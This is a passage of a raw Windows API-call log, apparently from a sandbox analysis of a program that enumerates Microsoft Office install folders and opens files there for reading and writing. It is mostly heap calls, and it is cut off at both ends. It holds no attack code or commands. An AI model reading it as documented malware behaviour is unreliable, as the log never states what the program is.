(in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0099.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0099.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0099.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0099.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0099.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0099.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0099.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0099.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0099.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0099.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d0d0 [0099.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0099.579] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.579] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.579] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.579] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d0d0 | out: hHeap=0x20000) returned 1 [0099.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.579] AreFileApisANSI () returned 1 [0099.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml", lpUsedDefaultChar=0x0) returned 74 [0099.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d370 [0099.580] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.580] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0099.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0099.580] AreFileApisANSI () returned 1 [0099.580] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0099.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x85c60 [0099.580] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x85c60, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml") returned 74 [0099.580] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\authoredextensions.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0099.580] GetFileType (hFile=0x360) returned 0x1 [0099.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85c60 | out: hHeap=0x20000) returned 1 [0099.580] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.581] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.581] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.581] CloseHandle (hObject=0x360) returned 1 [0099.581] AreFileApisANSI () returned 1 [0099.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0099.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x854e0 [0099.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x854e0, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml") returned 74 [0099.581] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\authoredextensions.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0099.581] GetFileType (hFile=0x360) returned 0x1 [0099.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x854e0 | out: hHeap=0x20000) returned 1 [0099.581] CloseHandle (hObject=0x360) returned 1 [0099.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0099.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0099.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0099.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0099.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0099.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0099.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0099.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0099.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0099.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0099.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0099.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0099.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0099.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0099.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0099.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0099.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0099.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0099.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0099.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0099.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0099.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0099.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0099.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0099.583] AreFileApisANSI () returned 1 [0099.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0099.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x85b20 [0099.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x85b20, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml") returned 74 [0099.583] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\authoredextensions.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8396fbd3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8396fbd3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e80c2c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x175)) returned 1 [0099.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85b20 | out: hHeap=0x20000) returned 1 [0099.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0099.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d370 | out: hHeap=0x20000) returned 1 [0099.583] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.583] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.583] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x92, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8c7a8, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x92, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ag", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓ŵ")) returned 0 [0099.583] FindClose (in: hFindFile=0x78410 | out: hFindFile=0x78410) returned 1 [0099.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0099.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0099.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0099.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0099.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0099.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0099.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0099.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0099.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46278 | out: hHeap=0x20000) returned 1 [0099.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0099.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0099.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0099.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0099.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0099.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0099.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0099.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0099.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0099.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0099.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0099.584] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.584] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.584] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.584] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0099.584] AreFileApisANSI () returned 1 [0099.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root", lpUsedDefaultChar=0x0) returned 39 [0099.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.584] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.584] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0099.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0099.584] AreFileApisANSI () returned 1 [0099.584] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0099.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6d268 [0099.584] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x6d268, cchWideChar=39 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root") returned 39 [0099.584] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root" (normalized: "c:\\program files\\microsoft office\\root"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.584] GetLastError () returned 0x5 [0099.585] GetLastError () returned 0x5 [0099.585] SetLastError (dwErrCode=0x5) [0099.585] GetLastError () returned 0x5 [0099.585] SetLastError (dwErrCode=0x5) [0099.585] GetLastError () returned 0x5 [0099.585] SetLastError (dwErrCode=0x5) [0099.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d268 | out: hHeap=0x20000) returned 1 [0099.585] AreFileApisANSI () returned 1 [0099.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0099.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6ce48 [0099.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x6ce48, cchWideChar=39 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root") returned 39 [0099.585] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root" (normalized: "c:\\program files\\microsoft office\\root"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.585] GetLastError () returned 0x5 [0099.585] GetLastError () returned 0x5 [0099.585] SetLastError (dwErrCode=0x5) [0099.585] GetLastError () returned 0x5 [0099.585] SetLastError (dwErrCode=0x5) [0099.585] GetLastError () returned 0x5 [0099.585] SetLastError (dwErrCode=0x5) [0099.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0099.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.585] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.585] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.585] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.585] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0099.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0099.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0099.586] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc54d73d0, ftCreationTime.dwHighDateTime=0x1d55162, ftLastAccessTime.dwLowDateTime=0x25268460, ftLastAccessTime.dwHighDateTime=0x1d558af, ftLastWriteTime.dwLowDateTime=0x25268460, ftLastWriteTime.dwHighDateTime=0x1d558af, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="trillian.exe", cAlternateFileName="")) returned 1 [0099.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0099.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0099.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d370 [0099.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0099.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69db0 [0099.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0099.586] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78290 [0099.586] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83189ec0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb2fdc25, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xeb2fdc25, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0099.586] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x86813dc4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd2ca2e08, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd2ca2e08, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="client", cAlternateFileName="")) returned 1 [0099.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0099.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0099.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x466d8 [0099.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0099.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0099.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0099.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0099.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0099.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0099.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0099.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0099.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a4b0 [0099.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: 